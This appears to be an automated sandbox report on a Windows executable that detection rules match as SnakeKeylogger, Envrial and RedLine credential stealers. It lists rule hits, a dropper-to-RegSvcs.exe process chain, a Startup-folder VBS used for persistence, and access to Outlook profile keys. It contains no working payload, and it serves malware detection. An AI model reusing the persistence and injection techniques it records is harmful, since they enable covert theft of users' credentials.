                Source: 2.2.RegSvcs.exe.2dd0000.2.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 2.2.RegSvcs.exe.2dd0000.2.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 2.2.RegSvcs.exe.2dd0000.2.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 2.2.RegSvcs.exe.2dd0000.2.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 2.2.RegSvcs.exe.2dd0000.2.raw.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 2.2.RegSvcs.exe.2dd0000.2.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 8.2.RegSvcs.exe.2d191ee.1.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 2.2.RegSvcs.exe.55f0000.4.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 2.2.RegSvcs.exe.55f0000.4.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 2.2.RegSvcs.exe.55f0000.4.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 8.2.RegSvcs.exe.2d191ee.1.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 8.2.RegSvcs.exe.2d191ee.1.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 8.2.RegSvcs.exe.2d18306.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 8.2.RegSvcs.exe.2d18306.0.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 8.2.RegSvcs.exe.2d18306.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 8.2.RegSvcs.exe.2d18306.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 8.2.RegSvcs.exe.2d18306.0.raw.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 8.2.RegSvcs.exe.2d18306.0.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 2.2.RegSvcs.exe.2dd0ee8.1.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 2.2.RegSvcs.exe.2dd0ee8.1.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 2.2.RegSvcs.exe.2dd0ee8.1.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 2.2.RegSvcs.exe.55f0000.4.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 2.2.RegSvcs.exe.55f0000.4.raw.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 2.2.RegSvcs.exe.55f0000.4.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 8.2.RegSvcs.exe.2d191ee.1.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 8.2.RegSvcs.exe.2d191ee.1.raw.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 8.2.RegSvcs.exe.2d191ee.1.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 2.2.RegSvcs.exe.2dd0ee8.1.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 2.2.RegSvcs.exe.2dd0ee8.1.raw.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 2.2.RegSvcs.exe.2dd0ee8.1.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 00000005.00000002.1925396391.0000000003DD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                Source: 00000002.00000002.4171766777.0000000002DD0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 00000002.00000002.4171766777.0000000002DD0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 00000002.00000002.4171766777.0000000002DD0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 00000001.00000002.1769744228.0000000000730000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                Source: 00000002.00000002.4178906465.00000000055F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 00000002.00000002.4178906465.00000000055F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 00000002.00000002.4178906465.00000000055F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 00000008.00000002.4171320345.0000000002CD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: Process Memory Space: RegSvcs.exe PID: 7508, type: MEMORYSTR | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: Process Memory Space: RegSvcs.exe PID: 7924, type: MEMORYSTR | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: classification engine | Classification label: mal100.troj.spyw.expl.evad.winEXE@10/6@3/3
                Source: C:\Users\user\Desktop\3i1gMM8K4z.exe | Code function: 0_2_00F4A06A GetLastError,FormatMessageW, 0_2_00F4A06A
                Source: C:\Users\user\Desktop\3i1gMM8K4z.exe | Code function: 0_2_00F381CB AdjustTokenPrivileges,CloseHandle, 0_2_00F381CB
                Source: C:\Users\user\Desktop\3i1gMM8K4z.exe | Code function: 0_2_00F387E1 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError, 0_2_00F387E1
                Source: C:\Users\user\AppData\Local\Okeghem\ghauts.exe | Code function: 1_2_005E81CB AdjustTokenPrivileges,CloseHandle, 1_2_005E81CB
                Source: C:\Users\user\AppData\Local\Okeghem\ghauts.exe | Code function: 1_2_005E87E1 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError, 1_2_005E87E1
                Source: C:\Users\user\Desktop\3i1gMM8K4z.exe | Code function: 0_2_00F4B3FB SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode, 0_2_00F4B3FB
                Source: C:\Users\user\Desktop\3i1gMM8K4z.exe | Code function: 0_2_00F5EE0D CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle, 0_2_00F5EE0D
                Source: C:\Users\user\Desktop\3i1gMM8K4z.exe | Code function: 0_2_00F583BB CoInitialize,CoUninitialize,CoCreateInstance,IIDFromString,VariantInit,VariantClear, 0_2_00F583BB
                Source: C:\Users\user\Desktop\3i1gMM8K4z.exe | Code function: 0_2_00EE4E89 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource, 0_2_00EE4E89
                Source: C:\Users\user\Desktop\3i1gMM8K4z.exe | File created: C:\Users\user\AppData\Local\Okeghem
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Mutant created: NULL
                Source: C:\Users\user\Desktop\3i1gMM8K4z.exe | File created: C:\Users\user\AppData\Local\Temp\aut9727.tmp
                Source: unknown | Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ghauts.vbs"
                Source: 3i1gMM8K4z.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Windows\System32\wscript.exe | File read: C:\Users\user\Desktop\desktop.ini
                Source: C:\Users\user\Desktop\3i1gMM8K4z.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: 3i1gMM8K4z.exe | ReversingLabs: Detection: 65%
                Source: C:\Users\user\Desktop\3i1gMM8K4z.exe | File read: C:\Users\user\Desktop\3i1gMM8K4z.exe
                Source: unknown | Process created: C:\Users\user\Desktop\3i1gMM8K4z.exe "C:\Users\user\Desktop\3i1gMM8K4z.exe"
                Source: C:\Users\user\Desktop\3i1gMM8K4z.exe | Process created: C:\Users\user\AppData\Local\Okeghem\ghauts.exe "C:\Users\user\Desktop\3i1gMM8K4z.exe"
                Source: C:\Users\user\AppData\Local\Okeghem\ghauts.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\3i1gMM8K4z.exe"
                Source: unknown | Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ghauts.vbs"
                Source: C:\Windows\System32\wscript.exe | Process created: C:\Users\user\AppData\Local\Okeghem\ghauts.exe "C:\Users\user\AppData\Local\Okeghem\ghauts.exe"
                Source: C:\Users\user\AppData\Local\Okeghem\ghauts.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\Okeghem\ghauts.exe"
                Source: C:\Users\user\Desktop\3i1gMM8K4z.exe | Process created: C:\Users\user\AppData\Local\Okeghem\ghauts.exe "C:\Users\user\Desktop\3i1gMM8K4z.exe"
                Source: C:\Users\user\AppData\Local\Okeghem\ghauts.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\3i1gMM8K4z.exe"
                Source: C:\Windows\System32\wscript.exe | Process created: C:\Users\user\AppData\Local\Okeghem\ghauts.exe "C:\Users\user\AppData\Local\Okeghem\ghauts.exe"
                Source: C:\Users\user\AppData\Local\Okeghem\ghauts.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\Okeghem\ghauts.exe"
                Source: C:\Users\user\Desktop\3i1gMM8K4z.exe | Section loaded: wsock32.dll
                Source: C:\Users\user\Desktop\3i1gMM8K4z.exe | Section loaded: version.dll
                Source: C:\Users\user\Desktop\3i1gMM8K4z.exe | Section loaded: winmm.dll
                Source: C:\Users\user\Desktop\3i1gMM8K4z.exe | Section loaded: mpr.dll
                Source: C:\Users\user\Desktop\3i1gMM8K4z.exe | Section loaded: wininet.dll
                Source: C:\Users\user\Desktop\3i1gMM8K4z.exe | Section loaded: iphlpapi.dll
                Source: C:\Users\user\Desktop\3i1gMM8K4z.exe | Section loaded: userenv.dll
                Source: C:\Users\user\Desktop\3i1gMM8K4z.exe | Section loaded: uxtheme.dll
                Source: C:\Users\user\Desktop\3i1gMM8K4z.exe | Section loaded: kernel.appcore.dll
                Source: C:\Users\user\Desktop\3i1gMM8K4z.exe | Section loaded: iconcodecservice.dll
                Source: C:\Users\user\Desktop\3i1gMM8K4z.exe | Section loaded: windowscodecs.dll
                Source: C:\Users\user\Desktop\3i1gMM8K4z.exe | Section loaded: windows.storage.dll
                Source: C:\Users\user\Desktop\3i1gMM8K4z.exe | Section loaded: wldp.dll
                Source: C:\Users\user\Desktop\3i1gMM8K4z.exe | Section loaded: cryptsp.dll
                Source: C:\Users\user\Desktop\3i1gMM8K4z.exe | Section loaded: rsaenh.dll
                Source: C:\Users\user\Desktop\3i1gMM8K4z.exe | Section loaded: cryptbase.dll
                Source: C:\Users\user\Desktop\3i1gMM8K4z.exe | Section loaded: apphelp.dll
                Source: C:\Users\user\AppData\Local\Okeghem\ghauts.exe | Section loaded: wsock32.dll
                Source: C:\Users\user\AppData\Local\Okeghem\ghauts.exe | Section loaded: version.dll
                Source: C:\Users\user\AppData\Local\Okeghem\ghauts.exe | Section loaded: winmm.dll
                Source: C:\Users\user\AppData\Local\Okeghem\ghauts.exe | Section loaded: mpr.dll
                Source: C:\Users\user\AppData\Local\Okeghem\ghauts.exe | Section loaded: wininet.dll
                Source: C:\Users\user\AppData\Local\Okeghem\ghauts.exe | Section loaded: iphlpapi.dll
                Source: C:\Users\user\AppData\Local\Okeghem\ghauts.exe | Section loaded: userenv.dll
                Source: C:\Users\user\AppData\Local\Okeghem\ghauts.exe | Section loaded: uxtheme.dll
                Source: C:\Users\user\AppData\Local\Okeghem\ghauts.exe | Section loaded: kernel.appcore.dll
                Source: C:\Users\user\AppData\Local\Okeghem\ghauts.exe | Section loaded: iconcodecservice.dll
                Source: C:\Users\user\AppData\Local\Okeghem\ghauts.exe | Section loaded: windowscodecs.dll
                Source: C:\Users\user\AppData\Local\Okeghem\ghauts.exe | Section loaded: windows.storage.dll
                Source: C:\Users\user\AppData\Local\Okeghem\ghauts.exe | Section loaded: wldp.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: version.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: kernel.appcore.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: uxtheme.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: sxs.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: vbscript.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: amsi.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: userenv.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: profapi.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: wldp.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: msasn1.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: cryptsp.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: rsaenh.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: cryptbase.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: msisip.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: wshext.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: scrobj.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: mlang.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: mpr.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: scrrun.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: windows.storage.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: propsys.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: edputil.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: urlmon.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: iertutil.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: srvcli.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: netutils.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: windows.staterepositoryps.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: sspicli.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: wintypes.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: appresolver.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: bcp47langs.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: slc.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: sppc.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: onecorecommonproxystub.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: onecoreuapcommonproxystub.dll
                Source: C:\Users\user\AppData\Local\Okeghem\ghauts.exe | Section loaded: wsock32.dll
                Source: C:\Users\user\AppData\Local\Okeghem\ghauts.exe | Section loaded: version.dll
                Source: C:\Users\user\AppData\Local\Okeghem\ghauts.exe | Section loaded: winmm.dll
                Source: C:\Users\user\AppData\Local\Okeghem\ghauts.exe | Section loaded: mpr.dll
                Source: C:\Users\user\AppData\Local\Okeghem\ghauts.exe | Section loaded: wininet.dll
                Source: C:\Users\user\AppData\Local\Okeghem\ghauts.exe | Section loaded: iphlpapi.dll
                Source: C:\Users\user\AppData\Local\Okeghem\ghauts.exe | Section loaded: userenv.dll
                Source: C:\Users\user\AppData\Local\Okeghem\ghauts.exe | Section loaded: uxtheme.dll
                Source: C:\Users\user\AppData\Local\Okeghem\ghauts.exe | Section loaded: kernel.appcore.dll
                Source: C:\Users\user\AppData\Local\Okeghem\ghauts.exe | Section loaded: iconcodecservice.dll
                Source: C:\Users\user\AppData\Local\Okeghem\ghauts.exe | Section loaded: windowscodecs.dll
                Source: C:\Users\user\AppData\Local\Okeghem\ghauts.exe | Section loaded: windows.storage.dll
                Source: C:\Users\user\AppData\Local\Okeghem\ghauts.exe | Section loaded: wldp.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                Source: 3i1gMM8K4z.exe | Static file information: File size 1147904 > 1048576
                Source: 3i1gMM8K4z.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                Source: 3i1gMM8K4z.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                Source: 3i1gMM8K4z.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                Source: 3i1gMM8K4z.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: 3i1gMM8K4z.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                Source: 3i1gMM8K4z.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                Source: 3i1gMM8K4z.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: _.pdb source: RegSvcs.exe, 00000002.00000002.4171766777.0000000002DD0000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4171320345.0000000002CD8000.00000004.00000020.00020000.00000000.sdmp
